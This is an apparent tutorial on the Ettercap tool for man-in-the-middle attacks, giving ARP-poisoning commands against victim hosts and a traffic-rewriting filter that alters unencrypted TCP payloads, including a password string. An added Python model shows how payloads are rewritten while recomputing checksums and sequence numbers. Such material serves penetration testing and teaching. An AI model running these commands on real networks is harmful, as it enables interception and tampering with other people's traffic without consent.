Ettercap is a comprehensive suite for man-in-the-middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis. Everything below assumes the attacker is on the same layer-2 segment as the targets and runs as root.
Basic Sniffing
# ettercap -Tzq -i eth0
(-T: text interface, -z: start silently without the initial ARP scan of the subnet, -q: quiet, do not print packet payloads)
To sniff traffic between 2 hosts (ARP-poison both; the "remote" flag is needed when one of them is the gateway and you want the traffic it forwards to remote hosts, not only traffic between the two addresses):
# ettercap -i eth0 -Tq -M ARP:remote /victim_ip_A/ /victim_ip_B/
The TARGET syntax is MAC/IPs/PORTs; builds with IPv6 support use MAC/IPs/IPv6/PORTs, so the same targets become /victim_ip_A// and /victim_ip_B// there.
Capture traffic on a certain port only (here telnet, port 23, between 192.168.1.1 and the hosts 192.168.1.10 to 192.168.1.20; the port filter is part of the second TARGET):
# ettercap -i eth0 -T -M arp /192.168.1.1/ /192.168.1.10-20/23
MITM
Filter example (save as POC.filter; it rewrites strings in unencrypted TCP traffic to port 1234, nothing can be altered inside TLS or SSH):
# POC.filter: match on DATA.data, the raw payload. DECODED.data only carries
# data a dissector has decoded, so on an arbitrary port it would never match.
if (ip.proto == TCP && tcp.dst == 1234 && search(DATA.data, "2016-10-03")) {
    msg("Match date...\n");
    # each replace() rewrites every occurrence in the matching packet's payload
    replace("2016-10-03", "2017-10-03");
    replace("118.186.71.134", "111.222.33.444");
    replace("PASw0rD", "NOPassw");
}
Compile the filter:
# etterfilter -o POC.ef POC.filter
Launch ettercap with the compiled filter:
# ettercap -T -q -i eth0 -F POC.ef -M ARP
No TARGET is given here, so ettercap ARP-poisons every host it finds on the segment; restrict it to the hosts of interest with explicit targets as in the sniffing examples.
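To see what the filter above does at the wire level, here is an added example (not ettercap's code) that models one etterfilter rule in pure Python: it builds a constructed IPv4/TCP segment to port 1234, applies the match (ip.proto, tcp.dst, search) and the replace() calls, then rebuilds the IP total length and both checksums so the result is still a valid packet. It also returns the byte delta of the payload; the page's three rules are same-length so the delta is zero, but the model goes one step further and shows a longer replacement, where the MITM (ettercap does this per TCP session) has to carry that offset forward into every later sequence number in that direction and every acknowledgement coming back. Addresses, ports and the sample payload are constructed for the demo.

```python
"""Wire-level model of an etterfilter rule of the form
    if (ip.proto == TCP && tcp.dst == 1234 && search(DATA.data, "...")) { replace(...); }
Added example, not ettercap's own code; the packet contents are constructed.
"""
import struct

PROTO_TCP = 6


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _fix_checksums(pkt: bytes) -> bytes:
    """Recompute IPv4 total length, IPv4 checksum and TCP checksum."""
    ihl = (pkt[0] & 0x0F) * 4
    ip_hdr = bytearray(pkt[:ihl])
    tcp = bytearray(pkt[ihl:])
    struct.pack_into("!H", ip_hdr, 2, ihl + len(tcp))      # total length
    struct.pack_into("!H", ip_hdr, 10, 0)                   # zero before summing
    struct.pack_into("!H", ip_hdr, 10, checksum(bytes(ip_hdr)))
    struct.pack_into("!H", tcp, 16, 0)
    pseudo = struct.pack("!4s4sBBH", bytes(ip_hdr[12:16]), bytes(ip_hdr[16:20]),
                         0, PROTO_TCP, len(tcp))
    struct.pack_into("!H", tcp, 16, checksum(pseudo + bytes(tcp)))
    return bytes(ip_hdr) + bytes(tcp)


def build_packet(src_ip, dst_ip, sport, dport, seq, ack, payload):
    """Constructed minimal IPv4 + TCP (PSH|ACK) segment with valid checksums."""
    src, dst = (bytes(int(o) for o in ip.split(".")) for ip in (src_ip, dst_ip))
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload),
                         0x1234, 0x4000, 64, PROTO_TCP, 0, src, dst)
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                          5 << 4, 0x18, 65535, 0, 0)
    return _fix_checksums(ip_hdr + tcp_hdr + payload)


def parse(pkt: bytes):
    """Return (proto, dport, payload); dport is None and payload b"" if not TCP."""
    ihl = (pkt[0] & 0x0F) * 4
    proto = pkt[9]
    if proto != PROTO_TCP:
        return proto, None, b""
    dport = struct.unpack_from("!H", pkt, ihl + 2)[0]
    doff = (pkt[ihl + 12] >> 4) * 4
    return proto, dport, pkt[ihl + doff:]


def apply_filter(pkt: bytes, dst_port: int, needle: bytes, rules):
    """Model of the rule: match ip.proto / tcp.dst / search(), then replace().

    Returns (new_packet, delta). delta is how many bytes the payload grew
    (positive) or shrank; 0 means untouched or only same-length substitutions.
    """
    proto, dport, payload = parse(pkt)
    if proto != PROTO_TCP or dport != dst_port or needle not in payload:
        return pkt, 0
    new_payload = payload
    for what, with_ in rules:
        new_payload = new_payload.replace(what, with_)
    ihl = (pkt[0] & 0x0F) * 4
    doff = (pkt[ihl + 12] >> 4) * 4
    return _fix_checksums(pkt[:ihl + doff] + new_payload), len(new_payload) - len(payload)


def checksums_ok(pkt: bytes) -> bool:
    """A correct header (checksum field included) sums to zero under RFC 1071."""
    ihl = (pkt[0] & 0x0F) * 4
    pseudo = struct.pack("!4s4sBBH", pkt[12:16], pkt[16:20], 0, PROTO_TCP, len(pkt) - ihl)
    return checksum(pkt[:ihl]) == 0 and checksum(pseudo + pkt[ihl:]) == 0


# The three rules from POC.filter; all of them keep the payload length unchanged.
PAGE_RULES = [(b"2016-10-03", b"2017-10-03"),
              (b"118.186.71.134", b"111.222.33.444"),
              (b"PASw0rD", b"NOPassw")]
# Constructed sample segment from a victim to port 1234 (addresses are made up).
SAMPLE = build_packet("192.168.1.15", "192.168.1.1", 40000, 1234, 1000, 5000,
                      b"date=2016-10-03&host=118.186.71.134&pw=PASw0rD\r\n")

if __name__ == "__main__":
    out, delta = apply_filter(SAMPLE, 1234, b"2016-10-03", PAGE_RULES)
    print(parse(out)[2], delta, checksums_ok(out))
    # A longer replacement grows the segment: every later seq in this direction
    # and every ack from the peer must be shifted by delta for the session.
    out2, delta2 = apply_filter(SAMPLE, 1234, b"2016-10-03",
                                [(b"PASw0rD", b"hunter2-longer")])
    print(delta2, checksums_ok(out2))
```

The same-length replacements on the page are the safe case: the segment keeps its size and only the checksums change. The second call shows why ettercap must track a per-session offset once replace() changes the length; if a filter were applied without that adjustment the receiver would see a gap or overlap in the stream and the connection would stall.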